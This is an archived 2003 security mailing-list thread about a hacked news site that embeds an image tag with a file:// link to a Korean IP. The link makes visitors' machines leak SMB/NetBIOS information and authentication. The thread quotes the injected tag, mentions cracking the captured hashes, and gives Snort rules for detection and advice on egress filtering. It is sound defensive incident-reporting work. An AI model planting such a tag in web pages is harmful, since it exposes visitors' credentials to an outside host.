It's even worse than tracking who came by....that will cause the victim to pass NetBIOS authentication information to the host site (210.222.4.129). The victim site could be sniffing all NetBIOS traffic and then replay it and collect it with L0phtcrack and crack the password hashes. I would agree that this points to the value of egress filtering.....in a BIG way! I've been recommending html to text mail conversions but sometimes people like their html e-mail just a bit too much.....I just turned it off for one client this AM;( -----Original Message----- From: Stark, Vernon L. [mailto:Vern.Starkat_private] Sent: Tuesday, May 13, 2003 12:33 PM To: 'incidentsat_private' Subject: Stopping information leakage I recently spotted several of our hosts attempting to contact a host in Korea primarily on TCP ports 139 and 445. We believe we've run this to ground. Our analysis suggests this is due to a news site that has probably had their web page hacked. The web page contains the following source code: <img src=file://210.222.4.129/web.jpg> Packets captured from one of our hosts indicate that almost immediately after receiving this content, the host attempts to contact host 210.222.4.129 on port 445 and then on port 139. Various hosts involved have also used ports TCP 21 and UDP 137. According to www.apnic.net, 210.222.4.129 is assigned to the Korea Network Information Center. When I e-mailed the owner of the web site, he promptly called me. He indicated that he had removed the content shown above and it later reappeared. This content at least gives the attacker the ability to see who visits the web site. Depending upon the web site with the hacked content, this may provide the attacker with the ability to harvest a very useful member list. Moreover, if ports 139 and 445 are not blocked outbound, additional information leakage can result since the Korean host (when last tested) will gladly accept connections on port 139. A host can report host name, operating system, domain name, etc. This emphasizes the importance of having a policy that denies all traffic except that required. Such a policy will generally deny outbound traffic on ports 139 and 445 since this traffic is generally only appropriate on the intranet. The following Snort rules have been used to track this particular traffic: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129 spotted. Korean port 139 host."; content:"210.222.4.129"; ) alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129 spotted. Korean port 139 host."; content:"210.222.4.129"; ) alert tcp $HOME_NET any -> $EXTERNAL_NET 139 (msg:"Outgoing port 139 activity"; ) alert tcp $HOME_NET any -> $EXTERNAL_NET 445 (msg:"Outgoing port 445 activity"; ) Vern Stark, GCIA, GSEC JHU/APL Any opinions expressed are mine and may not reflect those of my employer. ---------------------------------------------------------------------------- *** Wireless LAN Policies for Security & Management - NEW White Paper *** Just like wired networks, wireless LANs require network security policies that are enforced to protect WLANs from known vulnerabilities and threats. Learn to design, implement and enforce WLAN security policies to lockdown enterprise WLANs. To get your FREE white paper visit us at: http://www.securityfocus.com/AirDefense-incidents ---------------------------------------------------------------------------- ---------------------------------------------------------------------------- *** Wireless LAN Policies for Security & Management - NEW White Paper *** Just like wired networks, wireless LANs require network security policies that are enforced to protect WLANs from known vulnerabilities and threats. Learn to design, implement and enforce WLAN security policies to lockdown enterprise WLANs. To get your FREE white paper visit us at: http://www.securityfocus.com/AirDefense-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue May 13 2003 - 14:24:14 PDT